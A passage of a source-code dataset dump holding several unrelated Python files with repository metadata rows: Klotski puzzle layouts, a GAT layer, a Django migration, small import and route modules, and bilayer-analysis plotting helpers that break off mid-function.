bingList = [b1, b2, b3, b4]
return Zhen(caoCao, jiangList, bingList)
# 巧过五关 (Slipping Through the Five Passes):
def QGWG():
# caoCao:
caoCao = CaoCao([1, 0])
# Jiangs:
zhaoYun = Jiang([0, 3], HOR, 'y')
guanYu = Jiang([0, 2], HOR, 'g')
maChao = Jiang([2, 3], HOR, 'm')
huangZhong = Jiang([1, 4], HOR, 'h')
zhangFei = Jiang([2, 2], HOR, 'z')
jiangList = [zhaoYun, guanYu, maChao, huangZhong, zhangFei]
# Bings:
b1 = Bing([0, 0])
b2 = Bing([0, 1])
b3 = Bing([3, 0])
b4 = Bing([3, 1])
bingList = [b1, b2, b3, b4]
return Zhen(caoCao, jiangList, bingList)
# 五将逼宫 (Five Generals Besiege the Palace):
def WJBG():
# caoCao:
caoCao = CaoCao([1, 1])
# Jiangs:
zhaoYun = Jiang([1, 3], HOR, 'y')
guanYu = Jiang([0, 0], HOR, 'g')
maChao = Jiang([0, 1], VER, 'm')
huangZhong = Jiang([3, 1], VER, 'h')
zhangFei = Jiang([2, 0], HOR, 'z')
jiangList = [zhaoYun, guanYu, maChao, huangZhong, zhangFei]
# Bings:
b1 = Bing([0, 3])
b2 = Bing([0, 4])
b3 = Bing([3, 3])
b4 = Bing([3, 4])
bingList = [b1, b2, b3, b4]
return Zhen(caoCao, jiangList, bingList)
# 兵临曹营 (Soldiers at Cao Cao's Camp):
def BLCY():
# caoCao:
caoCao = CaoCao([1, 0])
# Jiangs:
zhaoYun = Jiang([3, 2], VER, 'y')
guanYu = Jiang([1, 2], HOR, 'g')
maChao = Jiang([1, 3], VER, 'm')
huangZhong = Jiang([2, 3], VER, 'h')
zhangFei = Jiang([0, 2], VER, 'z')
jiangList = [zhaoYun, guanYu, maChao, huangZhong, zhangFei]
# Bings:
b1 = Bing([0, 0])
b2 = Bing([0, 1])
b3 = Bing([3, 0])
b4 = Bing([3, 1])
bingList = [b1, b2, b3, b4]
return Zhen(caoCao, jiangList, bingList)
# 四将连关 (Four Generals in a Chain):
def SJLG():
# caoCao:
caoCao = CaoCao([0, 0])
# Jiangs:
zhaoYun = Jiang([2, 2], HOR, 'y')
guanYu = Jiang([2, 0], HOR, 'g')
maChao = Jiang([0, 2], VER, 'm')
huangZhong = Jiang([1, 2], VER, 'h')
zhangFei = Jiang([2, 1], HOR, 'z')
jiangList = [zhaoYun, guanYu, maChao, huangZhong, zhangFei]
# Bings:
b1 = Bing([0, 4])
b2 = Bing([2, 3])
b3 = Bing([3, 3])
b4 = Bing([3, 4])
bingList = [b1, b2, b3, b4]
return Zhen(caoCao, jiangList, bingList)
# 新近在咫尺 (Within Arm's Reach):
def XJZZC():
# caoCao:
caoCao = CaoCao([0, 3])
# Jiangs:
zhaoYun = Jiang([2, 2], VER, 'y')
guanYu = Jiang([0, 1], HOR, 'g')
maChao = Jiang([3, 0], VER, 'm')
huangZhong = Jiang([2, 0], VER, 'h')
zhangFei = Jiang([3, 2], VER, 'z')
jiangList = [zhaoYun, guanYu, maChao, huangZhong, zhangFei]
# Bings:
b1 = Bing([0, 2])
b2 = Bing([1, 2])
b3 = Bing([2, 4])
b4 = Bing([3, 4])
bingList = [b1, b2, b3, b4]
return Zhen(caoCao, jiangList, bingList)
# 星罗棋布 (Scattered Like Stars on a Chessboard):
def XLQB():
# caoCao:
caoCao = CaoCao([1, 2])
# Jiangs:
zhaoYun = Jiang([1, 4], HOR, 'y')
guanYu = Jiang([1, 0], HOR, 'g')
maChao = Jiang([3, 1], VER, 'm')
huangZhong = Jiang([0, 1], VER, 'h')
zhangFei = Jiang([1, 1], HOR, 'z')
jiangList = [zhaoYun, guanYu, maChao, huangZhong, zhangFei]
# Bings:
b1 = Bing([0, 0])
b2 = Bing([3, 0])
b3 = Bing([0, 3])
b4 = Bing([3, 3])
bingList = [b1, b2, b3, b4]
return Zhen(caoCao, jiangList, bingList)
# 四面八方 (From All Directions):
def SMBF():
# caoCao:
caoCao = CaoCao([1, 2])
# Jiangs:
zhaoYun = Jiang([1, 4], HOR, 'y')
guanYu = Jiang([1, 0], HOR, 'g')
maChao = Jiang([3, 2], VER, 'm')
huangZhong = Jiang([0, 2], VER, 'h')
zhangFei = Jiang([1, 1], HOR, 'z')
jiangList = [zhaoYun, guanYu, maChao, huangZhong, zhangFei]
# Bings:
b1 = Bing([0, 1])
b2 = Bing([3, 1])
b3 = Bing([0, 4])
b4 = Bing([3, 4])
bingList = [b1, b2, b3, b4]
return Zhen(caoCao, jiangList, bingList)
# 牛气冲天 (Soaring Spirits):
def NQCT():
# caoCao:
caoCao = CaoCao([1, 2])
# Jiangs:
zhaoYun = Jiang([1, 4], HOR, 'y')
guanYu = Jiang([0, 1], HOR, 'g')
maChao = Jiang([3, 2], VER, 'm')
huangZhong = Jiang([0, 2], VER, 'h')
zhangFei = Jiang([2, 1], HOR, 'z')
jiangList = [zhaoYun, guanYu, maChao, huangZhong, zhangFei]
# Bings:
b1 = Bing([0, 0])
b2 = Bing([3, 0])
b3 = Bing([0, 4])
b4 = Bing([3, 4])
bingList = [b1, b2, b3, b4]
return Zhen(caoCao, jiangList, bingList)
# 调兵遣将 (Deploying Troops and Dispatching Generals):
def DBQJ():
# caoCao:
caoCao = CaoCao([0, 0])
# Jiangs:
zhaoYun = Jiang([0, 3], HOR, 'y')
guanYu = Jiang([0, 2], HOR, 'g')
maChao = Jiang([2, 3], HOR, 'm')
huangZhong = Jiang([1, 4], HOR, 'h')
zhangFei = Jiang([2, 2], HOR, 'z')
jiangList = [zhaoYun, guanYu, maChao, huangZhong, zhangFei]
# Bings:
b1 = Bing([2, 0])
b2 = Bing([3, 0])
b3 = Bing([2, 1])
b4 = Bing([3, 1])
bingList = [b1, b2, b3, b4]
return Zhen(caoCao, jiangList, bingList)
# 背水列阵 (Battle Array with Backs to the River):
def BSZL():
# caoCao:
caoCao = CaoCao([1, 2])
# Jiangs:
zhaoYun = Jiang([2, 4], HOR, 'y')
guanYu = Jiang([1, 0], HOR, 'g')
maChao = Jiang([3, 0], VER, 'm')
huangZhong = Jiang([0, 0], VER, 'h')
zhangFei = Jiang([0, 4], HOR, 'z')
jiangList = [zhaoYun, guanYu, maChao, huangZhong, zhangFei]
# Bings:
b1 = Bing([1, 1])
b2 = Bing([2, 1])
b3 = Bing([0, 3])
b4 = Bing([3, 3])
bingList = [b1, b2, b3, b4]
return Zhen(caoCao, jiangList, bingList)
# 横刀立马2 (Blade Drawn on Horseback, variant 2):
def HDLM2():
# caoCao:
caoCao = CaoCao([1, 0])
# Jiangs:
zhaoYun = Jiang([0, 3], VER, 'y')
guanYu = Jiang([1, 2], HOR, 'g')
maChao = Jiang([3, 0], VER, 'm')
huangZhong = Jiang([0, 0], VER, 'h')
zhangFei = Jiang([3, 3], VER, 'z')
jiangList = [zhaoYun, guanYu, maChao, huangZhong, zhangFei]
# Bings:
b1 = Bing([0, 2])
b2 = Bing([1, 3])
b3 = Bing([2, 3])
b4 = Bing([3, 2])
bingList = [b1, b2, b3, b4]
return Zhen(caoCao, jiangList, bingList) | 24.323625 | 60 | 0.566525 | 1,166 | 7,516 | 3.651801 | 0.066038 | 0.090183 | 0.067637 | 0.086426 | 0.900658 | 0.859558 | 0.84946 | 0.842179 | 0.80202 | 0.798967 | 0 | 0.076076 | 0.202501 | 7,516 | 309 | 61 | 24.323625 | 0.634301 | 0.072379 | 0 | 0.728889 | 0 | 0 | 0.011586 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071111 | false | 0 | 0.004444 | 0 | 0.146667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cd7a47e07ba859f58f6b50d74a9658424bb5bd3f | 185 | py | Python | run_rmsd_pruning.py | ks8/conformation | f470849d5b7b90dc5a65bab8a536de1d57c1021a | [
"MIT"
] | null | null | null | run_rmsd_pruning.py | ks8/conformation | f470849d5b7b90dc5a65bab8a536de1d57c1021a | [
"MIT"
] | null | null | null | run_rmsd_pruning.py | ks8/conformation | f470849d5b7b90dc5a65bab8a536de1d57c1021a | [
"MIT"
] | null | null | null | """ RMSD pruning of RDKit conformations. """
from conformation.run_rmsd_pruning import run_rmsd_pruning, Args
if __name__ == '__main__':
run_rmsd_pruning(Args().parse_args())
| 30.833333 | 65 | 0.740541 | 24 | 185 | 5.083333 | 0.583333 | 0.360656 | 0.344262 | 0.295082 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.145946 | 185 | 5 | 66 | 37 | 0.772152 | 0.194595 | 0 | 0 | 0 | 0 | 0.058824 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
26a081d187514418bd883b088cf9e8819bb70d4c | 4,174 | py | Python | GAT/layers.py | phcavelar/graph-odenet | cba1224c041e53ea221e31bf9103ef950b8bd460 | [
"MIT"
] | 4 | 2019-12-10T18:49:03.000Z | 2022-02-16T03:21:30.000Z | GAT/layers.py | phcavelar/graph-odenet | cba1224c041e53ea221e31bf9103ef950b8bd460 | [
"MIT"
] | 1 | 2020-11-04T04:41:09.000Z | 2021-01-07T18:52:37.000Z | GAT/layers.py | phcavelar/graph-odenet | cba1224c041e53ea221e31bf9103ef950b8bd460 | [
"MIT"
] | 2 | 2020-04-03T12:05:33.000Z | 2020-10-10T11:57:48.000Z | import math
import torch
from torch.nn.parameter import Parameter
from torch.nn.modules.module import Module
import torch.nn.functional as F
import torch.nn as nn
class GraphConvolution(Module):
"""
GAT layer
"""
def __init__(self,in_features, out_features, bias=True,act=F.relu,eps=1e-6):
super(GraphConvolution,self).__init__()
self.in_features = in_features
self.out_features = out_features
self.f = nn.Linear(2*in_features,out_features)
self.w = nn.Linear(2*in_features,1)
self.eps = eps
self.act = act
self.reset_parameters()
def reset_parameters(self):
nn.init.xavier_uniform_(self.f.weight)
nn.init.xavier_uniform_(self.w.weight)
def forward(self,x,src,tgt,Mtgt):
"""
features -> N,i node features
adj -> N,N adjacency matrix
src -> E,i source index for edges
tgt -> E,i target index for edges
Msrc -> N,E adjacency matrix from source nodes to edges
Mtgt -> N,E adjacency matrix from target nodes to edges
"""
hsrc = x[src] # E,i
htgt = x[tgt] # E,i
h = torch.cat([hsrc,htgt],dim=1) # E,2i
y = self.act(self.f(h)) # E,o
        # FIXME: manual softmax doesn't behave as expected numerically
a = self.w(h) # E,1
assert not torch.isnan(a).any()
a_base, _ = torch.max(a,0,keepdim=True)#[0] + self.eps
assert not torch.isnan(a_base).any()
a_norm = a-a_base
assert not torch.isnan(a_norm).any()
a_exp = torch.exp(a_norm)
assert not torch.isnan(a_exp).any()
a_sum = torch.spmm(Mtgt,a_exp) + self.eps # N,E x E,1 = N,1
assert not torch.isnan(a_sum).any()
o = torch.spmm(Mtgt,y * a_exp) / a_sum # N,1
assert not torch.isnan(o).any()
return o
def __repr__(self):
return self.__class__.__name__ + ' (' \
+ str(self.in_features) + ' -> ' \
+ str(self.out_features) + ')'
class FixedGraphConvolution(Module):
"""
GAT layer
"""
def __init__(self,in_features, out_features, bias=True,act=F.relu,eps=1e-6):
super(FixedGraphConvolution,self).__init__()
self.in_features = in_features
self.out_features = out_features
self.f = nn.Linear(2*in_features,out_features)
self.w = nn.Linear(2*in_features,1)
self.eps = eps
self.act = act
self.reset_parameters()
self.src = torch.Tensor( [[1]] )
self.tgt = torch.Tensor( [[1]] )
self.Mtgt = torch.Tensor( [[1]] )
def reset_parameters(self):
nn.init.xavier_uniform_(self.f.weight)
nn.init.xavier_uniform_(self.w.weight)
def set_adj(self,src,tgt,Mtgt):
self.src = src
self.tgt = tgt
self.Mtgt = Mtgt
def forward(self,x):
"""
features -> N,i node features
adj -> N,N adjacency matrix
src -> E,i source index for edges
tgt -> E,i target index for edges
Msrc -> N,E adjacency matrix from source nodes to edges
Mtgt -> N,E adjacency matrix from target nodes to edges
"""
hsrc = x[self.src] # E,i
htgt = x[self.tgt] # E,i
h = torch.cat([hsrc,htgt],dim=1) # E,2i
y = self.act(self.f(h)) # E,o
        # FIXME: manual softmax doesn't behave as expected numerically
a = self.w(h) # E,1
assert not torch.isnan(a).any()
a_base, _ = torch.max(a,0,keepdim=True)#[0] + self.eps
assert not torch.isnan(a_base).any()
a_norm = a-a_base
assert not torch.isnan(a_norm).any()
a_exp = torch.exp(a_norm)
assert not torch.isnan(a_exp).any()
a_sum = torch.spmm(self.Mtgt,a_exp) + self.eps # N,E x E,1 = N,1
assert not torch.isnan(a_sum).any()
o = torch.spmm(self.Mtgt,y * a_exp) / a_sum # N,1
assert not torch.isnan(o).any()
return o
def __repr__(self):
return self.__class__.__name__ + ' (' \
+ str(self.in_features) + ' -> ' \
+ str(self.out_features) + ')'
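# --- Hedged usage sketch (not part of the original module) ---
# A minimal smoke test for GraphConvolution on a 3-node, 2-edge graph.
# Mtgt is the N x E target-incidence matrix consumed by torch.spmm above;
# the sizes and tensor names below are illustrative only.
if __name__ == '__main__':
    N, E, F_in, F_out = 3, 2, 4, 8
    x = torch.randn(N, F_in)
    src = torch.tensor([0, 1])  # edge source nodes
    tgt = torch.tensor([1, 2])  # edge target nodes
    # Mtgt[n, e] = 1 when edge e points at node n
    idx = torch.stack([tgt, torch.arange(E)])
    Mtgt = torch.sparse_coo_tensor(idx, torch.ones(E), (N, E))
    layer = GraphConvolution(F_in, F_out)
    out = layer(x, src, tgt, Mtgt)
    print(out.shape)  # expected: torch.Size([3, 8])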
| 32.609375 | 80 | 0.571874 | 612 | 4,174 | 3.732026 | 0.151961 | 0.052539 | 0.073555 | 0.099825 | 0.83275 | 0.823993 | 0.823993 | 0.823993 | 0.823993 | 0.823993 | 0 | 0.009942 | 0.30115 | 4,174 | 127 | 81 | 32.866142 | 0.773055 | 0.17058 | 0 | 0.674699 | 0 | 0 | 0.004258 | 0 | 0 | 0 | 0 | 0.015748 | 0.144578 | 1 | 0.108434 | false | 0 | 0.072289 | 0.024096 | 0.253012 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f837b166989cfe9785712f0531f203bbb2023ec8 | 231 | py | Python | src/edinet/app/eagle/models/__init__.py | ryuichi1208/air-pipeline | eac5cad9f089e41ed5aace2fdaf0aff3696efb09 | [
"Apache-2.0"
] | 5 | 2019-12-01T07:50:04.000Z | 2021-06-01T02:04:22.000Z | airflow_ml/edinet_flow/app/eagle/models/__init__.py | icoxfog417/airflow-ml-exercises | 9fc1072a38be7a014ba2ec1a955d96b87c03e104 | [
"MIT"
] | 13 | 2019-12-04T23:09:46.000Z | 2022-03-01T23:10:31.000Z | airflow_ml/edinet_flow/app/eagle/models/__init__.py | icoxfog417/airflow-ml-exercises | 9fc1072a38be7a014ba2ec1a955d96b87c03e104 | [
"MIT"
] | 2 | 2020-05-22T14:27:49.000Z | 2020-10-09T03:20:50.000Z | from .masters import Company
from .masters import EDINETCompany
from .masters import Document
from .masters import EDINETDocument
from .data import CompanyData
from .features import Feature
from .features import NumberOfExecutives
| 28.875 | 40 | 0.848485 | 28 | 231 | 7 | 0.428571 | 0.22449 | 0.346939 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 231 | 7 | 41 | 33 | 0.965517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
f84375d64eec2f0a266e3d776db9be22ea85a96e | 3,209 | py | Python | indicators/migrations/0056_add_verbose_names_to_indicator_fields.py | mercycorps/TolaWorkflow | 59542132fafd611081adb0e8cfaa04abc5886d7a | [
"Apache-2.0"
] | null | null | null | indicators/migrations/0056_add_verbose_names_to_indicator_fields.py | mercycorps/TolaWorkflow | 59542132fafd611081adb0e8cfaa04abc5886d7a | [
"Apache-2.0"
] | 268 | 2020-03-31T15:46:59.000Z | 2022-03-31T18:01:08.000Z | indicators/migrations/0056_add_verbose_names_to_indicator_fields.py | Falliatcom-sa/falliatcom | 39fb926de072c296ed32d50cccfb8003ca870739 | [
"Apache-2.0"
] | 1 | 2021-01-05T01:58:24.000Z | 2021-01-05T01:58:24.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2019-04-30 18:39
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('indicators', '0055_auto_20190425_1030'),
]
operations = [
migrations.AlterField(
model_name='externalservice',
name='feed_url',
field=models.CharField(blank=True, max_length=765, verbose_name='Feed URL'),
),
migrations.AlterField(
model_name='externalservice',
name='url',
field=models.CharField(blank=True, max_length=765, verbose_name='URL'),
),
migrations.AlterField(
model_name='externalservicerecord',
name='create_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Create date'),
),
migrations.AlterField(
model_name='externalservicerecord',
name='edit_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Edit date'),
),
migrations.AlterField(
model_name='historicalresult',
name='create_date',
field=models.DateTimeField(blank=True, help_text=b' ', null=True, verbose_name='Create date'),
),
migrations.AlterField(
model_name='historicalresult',
name='edit_date',
field=models.DateTimeField(blank=True, help_text=b' ', null=True, verbose_name='Edit date'),
),
migrations.AlterField(
model_name='historicalresult',
name='evidence_url',
field=models.CharField(blank=True, max_length=255, verbose_name='Evidence URL'),
),
migrations.AlterField(
model_name='historicalresult',
name='record_name',
field=models.CharField(blank=True, max_length=135, verbose_name='Record name'),
),
migrations.AlterField(
model_name='result',
name='create_date',
field=models.DateTimeField(blank=True, help_text=b' ', null=True, verbose_name='Create date'),
),
migrations.AlterField(
model_name='result',
name='edit_date',
field=models.DateTimeField(blank=True, help_text=b' ', null=True, verbose_name='Edit date'),
),
migrations.AlterField(
model_name='result',
name='evidence_url',
field=models.CharField(blank=True, max_length=255, verbose_name='Evidence URL'),
),
migrations.AlterField(
model_name='result',
name='record_name',
field=models.CharField(blank=True, max_length=135, verbose_name='Record name'),
),
migrations.AlterField(
model_name='result',
name='site',
field=models.ManyToManyField(blank=True, help_text=b' ', to='workflow.SiteProfile', verbose_name='Site'),
),
migrations.AlterField(
model_name='tolatable',
name='url',
field=models.CharField(blank=True, max_length=255, verbose_name='URL'),
),
]
| 37.313953 | 117 | 0.593643 | 320 | 3,209 | 5.76875 | 0.209375 | 0.151679 | 0.189599 | 0.219935 | 0.832069 | 0.819068 | 0.718852 | 0.703684 | 0.693933 | 0.689599 | 0 | 0.023488 | 0.283577 | 3,209 | 85 | 118 | 37.752941 | 0.779469 | 0.02119 | 0 | 0.782051 | 1 | 0 | 0.153282 | 0.020714 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.025641 | 0 | 0.064103 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
f849e70fef8dd493d9718a1c9cc7d5e4721bf535 | 111 | py | Python | appfly/app/routes/ping.py | expresso/appfly | 98c6e8a142752847591e6672bb3dc2e5f1fc2ac2 | [
"MIT"
] | null | null | null | appfly/app/routes/ping.py | expresso/appfly | 98c6e8a142752847591e6672bb3dc2e5f1fc2ac2 | [
"MIT"
] | null | null | null | appfly/app/routes/ping.py | expresso/appfly | 98c6e8a142752847591e6672bb3dc2e5f1fc2ac2 | [
"MIT"
] | null | null | null | from appfly.app import response
# from appfly import response
def route():
return response.factory("pong!") | 27.75 | 36 | 0.756757 | 15 | 111 | 5.6 | 0.666667 | 0.238095 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.144144 | 111 | 4 | 36 | 27.75 | 0.884211 | 0.243243 | 0 | 0 | 0 | 0 | 0.060241 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
6efadf53d38108851fe28f240f411a68010d3253 | 65,805 | py | Python | pybilt/plot_generation/plot_generation_functions.py | blakeaw/ORBILT | ed402dd496534dccd00f3e75b57007d944c58c1d | [
"MIT"
] | 11 | 2019-07-29T16:21:53.000Z | 2022-02-02T11:44:57.000Z | pybilt/plot_generation/plot_generation_functions.py | blakeaw/ORBILT | ed402dd496534dccd00f3e75b57007d944c58c1d | [
"MIT"
] | 11 | 2019-05-15T09:30:05.000Z | 2021-07-19T16:49:59.000Z | pybilt/plot_generation/plot_generation_functions.py | blakeaw/ORBILT | ed402dd496534dccd00f3e75b57007d944c58c1d | [
"MIT"
] | 9 | 2019-08-12T11:14:45.000Z | 2020-12-22T18:22:55.000Z | '''
A set of functions to generate plots/figures from the lipid bilayer analysis outputs.
These functions use matplotlib (http://matplotlib.org/index.html) along with Seaborn (
https://stanford.edu/~mwaskom/software/seaborn/index.html).
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import matplotlib as mpl
from six.moves import range
# check for a display and switch the mpl backend to Agg if there is none
# solution based on answer by eitanrich
# https://stackoverflow.com/questions/8257385/automatic-detection-of-display-availability-with-matplotlib
if os.name == 'posix' and "DISPLAY" not in os.environ:
mpl.use('Agg')
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
import sys
import itertools
# the default savefig params can be different from the display params
# e.g., you may want a higher resolution, or to make the figure
# background white
sfig_params = {
'savefig.dpi' : 750,
'savefig.format' : 'eps'
}
mpl.rcParams.update(sfig_params)
params = {'figure.figsize': [8.75, 7.25], 'font.size': 22, 'axes.labelsize': 32,
#params = {'figure.figsize': [14.75, 7.25], 'font.size': 22, 'axes.labelsize': 32,
'legend.fontsize': 26,
'xtick.labelsize': 28,
'ytick.labelsize': 28,
'lines.linewidth': 4.0,
'lines.markersize': 20,
'mathtext.fontset' : 'cm'}
mpl.rcParams.update(params)
#sns.set_style("whitegrid")
#sns.set_style("white")
#sns.set(context="paper", font="monospace")
sns.set_style("ticks")
_color_list = ['blue', 'green','orange','purple', 'black', 'red', 'yellow', 'gray']
def update_rcparams(rcparams):
mpl.rcParams.update(rcparams)
return
def plot(dat_list,yerr_list=None, xerr_list=None, name_list=None,filename='plot.eps', save=True, show=False, xlabel=None, ylabel=None,
marker=None, linestyle=None, xticks=None):
"""Generic plotting function for (multiple) xy datasets.
Args:
dat_list (list or list like): List of tuples of data vectors in the format [(x_0, y_0), (x_1. y_1), ... ]
        yerr_list (list or list like): List of the yerr vectors. e.g. [y_0_err, y_1_err, ... ]
        xerr_list (list or list like): List of the xerr vectors. e.g. [x_0_err, x_1_err, ... ]
name_list (list or list like, Optional): List of string legend names to assign the curves being plotted.
filename (str, Optional): The string containing the path and filename for the exported plot file.
save (bool, Optional): Set whether to save the generated plot to disc with filename. Default: True
show (bool, Optional): Set whether to show the generated plot in an interactive window (i.e. plt.show()).
Default: False
xlabel (str, Optional): Specify a x-axis label.
ylabel (str, Optional): Specify a y-axis label
        marker (str, Optional): Specify a matplotlib marker type for data points.
        linestyle (str, Optional): Specify a matplotlib linestyle for the curves.
        xticks (list or array, Optional): Specify explicit x-axis tick locations.
"""
_colors = itertools.cycle(('#47d147', '#2929a3', '#e6b800', '#e65c00', '#cc33ff', '#33ccff', '#009999', '#996633', '#666699'))
_marker = itertools.cycle(('s', 'o', 'v', 'p', 'D', '^', '8', '>', '<'))
ls = linestyle
if linestyle is None:
ls = '-'
i = 0
for dat in dat_list:
if i > 6 and (linestyle is None):
ls = '--'
if (yerr_list is None and xerr_list is None):
if name_list is not None:
if marker is None:
plt.plot(dat[0], dat[1],label=name_list[i], linestyle=ls,
marker=next(_marker), color=next(_colors))
else:
plt.plot(dat[0], dat[1],label=name_list[i], marker=marker,
linestyle=ls, color=next(_colors))
else:
if marker is None:
plt.plot(dat[0], dat[1], linestyle=ls,
marker=next(_marker), color=next(_colors))
else:
plt.plot(dat[0], dat[1], marker=marker, linestyle=ls,
color=next(_colors))
elif (yerr_list is not None) and (xerr_list is None):
if name_list is not None:
if marker is None:
plt.errorbar(dat[0], dat[1], yerr=yerr_list[i],
label=name_list[i], linestyle=ls,
marker=next(_marker), color=next(_colors))
else:
plt.errorbar(dat[0], dat[1], yerr=yerr_list[i],
label=name_list[i], marker=marker,
linestyle=ls, color=next(_colors))
else:
if marker is None:
plt.errorbar(dat[0], dat[1], yerr=yerr_list[i],
linestyle=ls, marker=next(_marker),
color=next(_colors))
else:
plt.errorbar(dat[0], dat[1], yerr=yerr_list[i],
marker=marker, linestyle=ls,
color=next(_colors))
elif (yerr_list is None) and (xerr_list is not None):
if name_list is not None:
if marker is None:
plt.errorbar(dat[0], dat[1], xerr=xerr_list[i],
label=name_list[i], linestyle=ls,
marker=next(_marker), color=next(_colors))
else:
plt.errorbar(dat[0], dat[1], xerr=xerr_list[i],
label=name_list[i], marker=marker,
linestyle=ls, color=next(_colors))
else:
if marker is None:
plt.errorbar(dat[0], dat[1], xerr=xerr_list[i],
linestyle=ls, marker=next(_marker),
color=next(_colors))
else:
plt.errorbar(dat[0], dat[1], xerr=xerr_list[i],
marker=marker, linestyle=ls,
color=next(_colors))
else:
if name_list is not None:
if marker is None:
plt.errorbar(dat[0], dat[1], xerr=xerr_list[i],
yerr=yerr_list[i], label=name_list[i],
linestyle=ls, marker=next(_marker),
color=next(_colors))
else:
plt.errorbar(dat[0], dat[1], xerr=xerr_list[i],
yerr=yerr_list[i],label=name_list[i],
marker=marker, linestyle=ls,
color=next(_colors))
else:
if marker is None:
plt.errorbar(dat[0], dat[1], xerr=xerr_list[i],
yerr=yerr_list[i], linestyle=ls,
marker=next(_marker), color=next(_colors))
else:
plt.errorbar(dat[0], dat[1], xerr=xerr_list[i],
yerr=yerr_list[i], marker=marker,
linestyle=ls, color=next(_colors))
i+=1
if xticks is not None:
plt.xticks(xticks)
if xlabel is not None:
plt.xlabel(xlabel)
if ylabel is not None:
plt.ylabel(ylabel)
if xticks is not None:
plt.xticks(xticks)
lgd = None
if name_list is not None:
#lgd = plt.legend(loc=7)
if len(name_list) > 3:
lgd = plt.legend(loc="center left", bbox_to_anchor=(1.04, 0.5))
else:
lgd = plt.legend(loc=0)
plt.tight_layout()
if save:
if lgd is not None:
plt.savefig(filename, bbox_extra_artists=(lgd,), bbox_inches='tight')
else:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
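# Hedged usage sketch (synthetic data only): overlaying two curves with
# y error bars via the generic plot() helper above.
def _demo_plot():
    t = np.linspace(0.0, 10.0, 25)
    err = 0.05 * np.ones_like(t)
    plot([(t, np.sin(t)), (t, np.cos(t))], yerr_list=[err, err],
         name_list=['sin', 'cos'], filename='demo_plot.eps',
         xlabel='Time (ns)', ylabel='Signal')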
def gen_step_vector_ghost_tails(vectors_resnames, length=5, periodic_cut=75.0):
n_traj = len(vectors_resnames)
n_vecs = len(vectors_resnames[0][0])
tails = []
for i in range(n_traj):
back_index = i - length
while back_index < 0:
back_index += 1
tails.append([])
for j in range(n_vecs):
x = []
y = []
for k in range(back_index, i+1):
vec_c = vectors_resnames[k][0][j]
x.append(vec_c[0])
y.append(vec_c[1])
xx = []
yy = []
n_p = len(x)
for l in range(0, n_p-1):
cx = x[l]
nx = x[l+1]
cy = y[l]
ny = y[l+1]
dx = np.abs(nx - cx)
dy = np.abs(ny - cy)
#dist = np.sqrt(dx**2 + dy**2)
#print(dx, dy)
if dx < periodic_cut and dy < periodic_cut:
xx.append(cx)
yy.append(cy)
else:
xx = []
yy = []
xx.append(x[n_p-1])
yy.append(y[n_p-1])
#print(xx)
xk = np.array(xx)
yk = np.array(yy)
tails[i].append((xk, yk))
return tails
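# Hedged usage sketch: the ghost-tail generators expect a per-frame list of
# (coords, resnames) pairs where coords[j] holds at least the (x, y)
# position of lipid j in that frame (inferred from the indexing above).
def _demo_ghost_tails():
    rng = np.random.RandomState(0)
    frames = [(rng.uniform(0.0, 75.0, size=(10, 2)), ['POPC'] * 10)
              for _ in range(12)]
    tails = gen_step_vector_ghost_tails(frames, length=5)
    print(len(tails), len(tails[0]))  # 12 frames, 10 tails per frame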
def gen_step_vector_net_ghost_tails(vectors_resnames, length=6, group_size=2,
periodic_cut=75.0):
n_traj = len(vectors_resnames)
n_vecs = len(vectors_resnames[0][0])
tails = []
